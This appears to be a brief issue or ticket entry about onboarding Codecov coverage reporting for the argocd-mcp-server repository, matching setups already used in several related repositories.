Summary: The argocd-mcp-server PR's Codecov onboarding aligns with patterns already present in api, toolchain-common, and host-operator (coverage paths, make upload targets, workflows). toolchain-e2e appears not to have similar Codecov config in the searched locations.
Description
Onboard CodeCov (action item from the Agentic Readiness discussion)